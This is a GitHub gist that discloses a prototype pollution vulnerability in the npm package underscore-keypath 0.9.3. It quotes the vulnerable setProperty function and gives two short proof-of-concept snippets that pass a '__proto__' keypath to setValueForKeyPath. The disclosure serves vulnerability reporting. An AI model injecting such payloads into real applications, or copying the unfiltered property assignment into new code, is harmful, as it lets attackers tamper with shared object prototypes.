Created
April 9, 2023 07:44
-
-
Save lelecolacola123/cc0d1e73780127aea9482c05f2ff3252 to your computer and use it in GitHub Desktop.
Pollution Vulnerability Disclosure in the "underscore-keypath" library
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1、Affected module | |
the prototype pollution is affected the “underscore-keypath@0.9.3 ” | |
key-path mechanism extensions for underscore (mixin). | |
underscore-keypath let you access JavaScript objects and arrays with keypath easily. | |
2、relevant package manager/ecosystem | |
NPM ecosystem | |
3、vulnerability details | |
prototype pollution vulnerability in function setProperty() in underscore-keypath.js in underscore-keypath@0.9.3 | |
the function setProperty() :line 162 obj[name] = value is the point of prototype pollution | |
4、steps to reproduce | |
the entry function is setValueForKeyPath(), the function doesn't judge the arguments like“__proto__” ,pass the bad input like “__proto__” into the function,and then into the setProperty() function,lead to the prototype pollution. | |
var underscore =require("underscore-keypath") | |
//the first POC | |
// BAD_ARRAY2 = ['__proto__', 'prop'] | |
// console.log("Before: "+{}.prop) | |
// underscore.setValueForKeyPath({},BAD_ARRAY2,"polluted") | |
// console.log("After: "+{}.prop) | |
//the second POC | |
console.log("Before: "+{}.prop) | |
BAD_path = "__proto__.prop" | |
underscore.setValueForKeyPath({},BAD_path,"polluted") | |
console.log("After: "+{}.prop) | |
5、my credit:Yuhan Gao (gyhlelecola@163.com), Peng Zhou (zpbrent@gmail.com) | |
If you receives my email, please give me a reply. I look forward to your reply |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function setProperty(obj, name, value) { | |
"use strict"; | |
var setter = obj["set" + capitalize(name)]; | |
if (setter) { | |
return setter.call(obj, value); | |
} | |
if (name.indexOf("@") === 0) { | |
return setArrayProperty(obj, name, value); | |
} | |
obj[name] = value; | |
return value; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment